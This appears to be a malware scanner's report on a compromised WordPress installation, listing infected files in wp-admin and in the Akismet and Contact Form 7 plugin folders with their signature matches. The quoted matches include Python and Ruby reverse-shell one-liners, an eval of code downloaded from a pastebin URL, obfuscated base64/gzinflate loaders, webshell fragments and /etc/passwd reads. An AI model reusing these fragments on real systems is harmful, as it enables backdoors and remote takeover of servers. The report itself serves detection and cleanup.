Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/wp-admin/network.php Size: 144.79 kB Created: 2022-05-26 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 19
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
| Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["vmolgtof"]}=count(${${"GLOBALS"}["vcqqrlqbo"]});for(${$yienlc}=0;${${"GLOBALS"}["eqkvgoptfvkl"]}<${${"GLOBALS"}["ysjlzvro"]};${${"GLOBALS"}["rtolgl"]}++){${"GLOBALS"}["bpsfsqiel"]="fungsi";${${"GLOBALS"}["bpsfsqiel"]}[]=unx(${${"GLOBALS"}["vcqqrlqbo"]}[${${"GLOBALS"}["eqkvgoptfvkl"]}]);}if(isset($_GET["d"])){$lbcuxxaisydr="cdir";${"GLOBALS"}["ukbgkeds"]="fungsi";${${"GLOBALS"}["qqgfigbd"]}=unx($_GET["d"]);${${"GLOBALS"}["ukbgkeds"]}[14](${$lbcuxxaisydr});}else{${"GLOBALS"}["kussp...
| Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$gfyfrcaij}
| Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x78ft\x61h\x73ho\x66n
| Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42A\x4cS"}
| Exploit killall Dangerous RCE (Remote Code Execution) that allow remote attackers to kill processes on the target machine | <?php killall -9
| Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php exec(\"/bin/sh -i");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["upnhvmssw"]="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("".${${"GLOBALS"}["upnhvmssw"]}."",".${${"GLOBALS"}["mpogrnq"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){$ffzcwi="PortServer";echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${$...
| Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php exploit
| Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php WScript.shell
| Sign 5b557546 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php N5c3Rlb
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
| Sign ae7830db Dangerous Malware Signature (hash: ae7830db) | <?php Y2hy
| Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7) | <?php 73797374656d
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php Backdoor
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php zeXN0ZW
|
|
/custdata02/turtle/public_html/wp-admin/fyLrBjT5ZH3.php Size: 43.49 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'Rrw91fdz/83YnCl8/8n5oyXGyLj3JoLUooatYmIWyr1rYpzqZPdghJt9dWC3KOq+yLq5aYSGk/bOps7RPK14haQWzy4j9CO9kM9bwQWo3PmlnZyCCU2D1/Mh1tje7gUl740LAF0iJTrdh2y+POYx8q/dyIRKVhwtuqj8XMJCgoJ067gIFfhpVbpHLM80h8Ip7YYF31WmZzkMZl0ZTfc1V11M5GMp6yYDzMzatRMXO4tb9kUlVZvbqwJGjsLFvNQVFOXdE9jfjNEiyaBNTEodEvJyA8/DwSVbwmxV7WB+jqQySRs2Ji4ZZtB8lXGaCp57x3AVsLVVVxJxsg33/b3BogcEPjmcqWXHVcBpSBfVLlYmRpk+pFYSVrD+X/0HZZAYKIT1p3uynPDbozyvZauynPOho2y0L251MafcXI0jJ12wkSgGGRSPG0kUWPumqUAcrTIsoz9cqTAhqJLuXTMcPwfcXFx4YFNfLGO4ZPjaNNPaVi/VRH8...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($OZycP($IcBFp($DQRCp($PWFGE('Rrw91fdz/83YnCl8/8n5oyXGyLj3JoLUooatYmIWyr1rYpzqZPdghJt9dWC3KOq+yLq5aYSGk/bOps7RPK14haQWzy4j9CO9kM9bwQWo3PmlnZyCCU2D1/Mh1tje7gUl740LAF0iJTrdh2y+POYx8q/dyIRKVhwtuqj8XMJCgoJ067gIFfhpVbpHLM80h8Ip7YYF31WmZzkMZl0ZTfc1V11M5GMp6yYDzMzatRMXO4tb9kUlVZvbqwJGjsLFvNQVFOXdE9jfjNEiyaBNTEodEvJyA8/DwSVbwmxV7WB+jqQySRs2Ji4ZZtB8lXGaCp57x3AVsLVVVxJxsg33/b3BogcEPjmcqWXHVcBpSBfVLlYmRpk+pFYSVrD+X/0HZZAYKIT1p3uynPDbozyvZauynPOho2y0L251MafcXI0jJ12wkSgGGRSPG0kUWPumqUAcrTIsoz9cqTAhqJLuXT...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-admin/zfcitxsnh.php Size: 75.71 kB Created: 2024-06-04 20:27:34 Modified: 2024-06-04 20:27:34 Warns: 2 Dangers: 7
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xguSAEPeJHShBCkZzcykBesqf357vYG/...
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzinflate(base64_decode('TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xgu...
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5F
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x65\x76\x61\x6C
| Sign 7830f7a6 Line: 2 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0Yx
| Sign 8000b2f1 Line: 1 Dangerous Malware Signature (hash: 8000b2f1) | <?php <?php
eval("\x65
| Sign 80e70adc Line: 1 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
|
|
/custdata02/turtle/public_html/wp-admin/zfcrtwgtf.php Size: 166.78 kB Created: 2024-06-04 20:48:47 Modified: 2024-06-04 20:48:47 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/wp-content/plugins/akismet/_inc/img/click.php Size: 1.61 kB Created: 2022-03-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 39 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/wp-content/plugins/akismet/_inc/rtl/index.php Size: 117.84 kB Created: 2021-12-21 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
| Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
| Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
| Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].
| Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }
| Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
| Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6) | <?php nc -l
| Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073) | <?php /etc/passwd
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/admin/includes/index.php Size: 85.87 kB Created: 2022-05-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 6
| Description | Match |
|---|
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode ( str_rot13 ( join ( '' , $code )
| Exploit hex_char Line: 967 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function ( "/*\x64\x65\x28\x73\x74\x72*/\x24\x63\x6f\x64\x65/*\x63\x6f\x64\x65\x29*/" , "/*\x36\x34\x5f\x64\x65*/\x65\x76\x61\x6c\x20\x28\x20\x27\x20\x3f\x3e\x27" . "\x20\x2e\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28" . "\x20\x73\x74\x72\x5f\x72\x6f\x74\x31\x33\x20\x28\x20\x6a\x6f\x69\x6e\x20" . "\x28\x20\x27\x27\x20\x2c\x20\x24\x63\x6f\x64\x65\x20\x29\x20\x29\x20\x29" . "\x20\x2e\x20\x27\x3c\x3f\x70\x68\x70\x20\x27\x20\x29\x3b/*\x63\x6f\x64*/" ) ; $global_version = ...
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval ( ' ?>' . base64_decode ( str_rot13 ( join ( '' , $code ) ) ) . '<?php ' );/*cod*/" ) ; $global_version = array_walk ( $register_key , $check_copyright )
| Sign 237750ea Line: 967 Dangerous Malware Signature (hash: 237750ea) | <?php \x65\x76\x61\x6c
| Sign 237750ea Line: 969 Dangerous Malware Signature (hash: 237750ea) | <?php \x6a\x6f\x69\x6e
| Sign 99fc3b9d Line: 978 Dangerous Malware Signature (hash: 99fc3b9d) | <?php $global_version = array_walk /*
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/admin/js/index.php Size: 30.49 kB Created: 2021-11-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 7
| Description | Match |
|---|
Exploit etc_passwd Line: 154 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Exploit etc_passwd Line: 232 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php ///etc/passwd
| Exploit htaccess_type Line: 44 Dangerous RCE (Remote Code Execution), through Htaccess add type x-httpd-php/cgi, interpreting PHP code, allow remote attackers to execute PHP code on the target machine | <?php AddType application/x-httpd-cgi
| Sign 5b557546 Line: 66 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
| Sign 963e968a Line: 195 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign b236d073 Line: 154 Dangerous Malware Signature (hash: b236d073) | <?php /etc/passwd
| Sign cbea68d7 Line: 72 Dangerous Malware Signature (hash: cbea68d7) | <?php 73797374656d
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/block-editor/index.php Size: 1.45 kB Created: 2022-06-06 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("?>" . $xG75u)
| Function eval Line: 42 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\x3f\x3e" . $xG75u)
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/css/index.php Size: 14.24 kB Created: 2022-04-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 13
| Description | Match |
|---|
Exploit nano Line: 108 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[9]("{$Jd}/{$F1}")
| Exploit nano Line: 39 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[6]($yf)
| Exploit nano Line: 57 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[1]()
| Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[17](JD($_GET["n"])
| Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[4]("/(\\\\|\\/)
| Exploit nano Line: 77 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]($BL)
| Exploit nano Line: 81 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]("{$Jd}/{$_POST["n"]}")
| Exploit nano Line: 84 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])
| Exploit nano Line: 87 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[16]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"])
| Sign 5470607c Line: 63 Dangerous Malware Signature (hash: 5470607c) | <?php ]} ({$_SERVER[
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/swv/swv.php Size: 3.95 kB Created: 2024-06-02 19:18:05 Modified: 2024-06-02 19:26:52 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 75 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $rules[$rule_name]( $properties )
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/swv/index.php Size: 145.90 kB Created: 2021-10-25 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 18
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
| Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["golctxwuyq"]});for(${${"GLOBALS"}["mkbsmuux"]}=0;${${"GLOBALS"}["klevplx"]}<${$acqvczjfsw};${$bguvgwj}++){${"GLOBALS"}["kxwhluunpdho"]="Array";${"GLOBALS"}["itqour"]="fungsi";${${"GLOBALS"}["itqour"]}[]=unx(${${"GLOBALS"}["kxwhluunpdho"]}[${${"GLOBALS"}["lgjstiud"]}]);}if(isset($_GET["d"])){${"GLOBALS"}["ctopgggqijwm"]="cdir";${"GLOBALS"}["pltcmqfftfd"]="fungsi";${${"GLOBALS"}["ctopgggqijwm"]}=unx($_GET["d"]);${${"GLOBALS"}["pltcmqfftfd"]}[14](${${"GLOBALS"}["xnusza"]});}else{${"...
| Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$xrhxuou}
| Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x71g\x67uc\x79q\x67s
| Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4cOB\x41\x4cS"}
| Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php exec(\"/bin/sh -i\");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["hkrdyrymu"]="PortServer";$igilbvwnbdy="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\${$igilbvwnbdy}."",".${${"GLOBALS"}["hkrdyrymu"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${${"GL...
| Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php exploit
| Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php WScript.shell
| Sign 5b557546 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php N5c3Rlb
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
| Sign ae7830db Dangerous Malware Signature (hash: ae7830db) | <?php Y2hy
| Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7) | <?php 73797374656d
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php Backdoor
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php zeXN0ZW
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/modules/constant-contact/index.php Size: 1.05 kB Created: 2021-09-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code_web Dangerous RFU (Remote File Upload), from external website, allow to write malicious code on the target machine | <?php file_get_contents("https://pastebin.com/raw/NYwj9nzX")
| Exploit silenced_eval Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine | <?php @eval("?>".file_get_contents("https://pastebin.com/raw/NYwj9nzX")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("?>".file_get_contents("https://pastebin.com/raw/NYwj9nzX"))
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>
|
|
/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/modules/sendinblue/index.php Size: 20.97 kB Created: 2022-05-14 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 50 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "015c24a3dbfced3cbb7fca709e99719b27c764c45b12ce12432c1b7151832e1ceb0d2544f8768c4fe36f9080a21e360e74364f7d063e98dee97ce4b5bcca4ff6a4f80334604c3932566d5caf2f56a2540587001fc7c7d8f7d18f1f974aece56fbeff6f8709b1ce826f7ff3086e3ace53e20a5eccae52eddbdbb36fe9462d10e72ea1ba74a779116bbfc4772b4d8cdb57d1ee8437505877bffdb0125f720e7f97686b3af75d3915f0f706e4c61b5adf5d978677e07db0e50f0071d0da777aef1192ee812368737efeb662e2494d491b431cedaf8cc0edea3f3729dae626a98f0439b44d4dd2b3ed8319c42996e99feb06fb7d932a76fc8dbfbe7...
| Exploit hex_char Line: 48 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
